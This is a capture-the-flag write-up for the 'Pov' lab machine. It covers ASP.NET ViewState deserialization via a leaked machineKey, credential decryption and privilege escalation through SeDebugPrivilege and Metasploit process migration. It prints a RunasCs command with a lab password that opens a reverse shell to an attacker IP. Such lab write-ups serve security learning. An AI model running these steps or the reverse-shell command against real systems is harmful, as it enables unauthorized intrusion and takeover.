WRITE-UPS FOR Pov – solve on 02/02/2024
First of all, we just do a little bit scanning and config /etc/hosts
Looking around at the website, we cannot find anything
It’s time to gobuster for dir and vhost
Hurray, we find the dev.pov.htb
Looking around a little bit, it’s time to use BurpSuite. I found that the download function seems intriguing
Nothing useful with the contact page
Now we know the page is use ASP.NET with the version 4.0.30319. Suft the Internet I found something useful. Try the link for more in4 =)
https://soroush.me/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/
https://book.hacktricks.xyz/pentesting-web/deserialization/exploiting-__viewstate-parameter
Okey, it seems that we have to exploit LFI and VIEWSTATE value. Search the /web.config file as in instruction
Now we have the machineKey. Just try with ysoserial.
https://github.com/pwntester/ysoserial.net?tab=readme-ov-file
Finally, inject the payload into VIEWSTATE value we found before
The thing had come, I got the reverse shell as expected
Looking around the system, I found some credentials in connection.xml
Trying googling, it seems to be a credential for a object by powershell. I decrypted it.
https://stackoverflow.com/questions/63639876/powershell-password-decrypt
All right, now we have credential for users alaading.
Now, I have nothing to do. By continuing with searching efforts, I found a file called RunadCs. I search the Internet, and well …, It can help a lot.
https://github.com/antonioCoco/RunasCs
Now and use the application to get the second reverse shell on port 4444 with the user alaading
Searching around gave me user.txt as easy as cake.!!
Looking at the RunasCs docs, I found that I can even have more priviledge by adding –bypass-u
.\RunasCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.14.177:5555 --bypass-u
Now, we have the SeDebugPriviledge, searching the Internet, I found that I can escalate the privilege with this =>>>
The idea is to sending pay load to get the reverse TCP shell in meterpreter using Metasploits.
First, create payload in localhost
Run a python server to transfer payload to the target
Get the payload from the target machine
Config the Metasploit to listen on port
Connect and get the reverse shell
I won’t write any comment down here for a fews pictures. So if u don’t understand what I’m doing. Try this docs at the DLL hijacking section, it quite similar. (just use executable payload instead of .ddl file)
https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/
ALRIGHT, I’m back, now we have the reverse shell on Metasploits. To escalate the privilege, we migrate to winlogon.exe.
ps to find all process are running
Find the winlogon.exe. Migrate using ID
Get the shell and all things done
Good job!!! See u on the another machine bro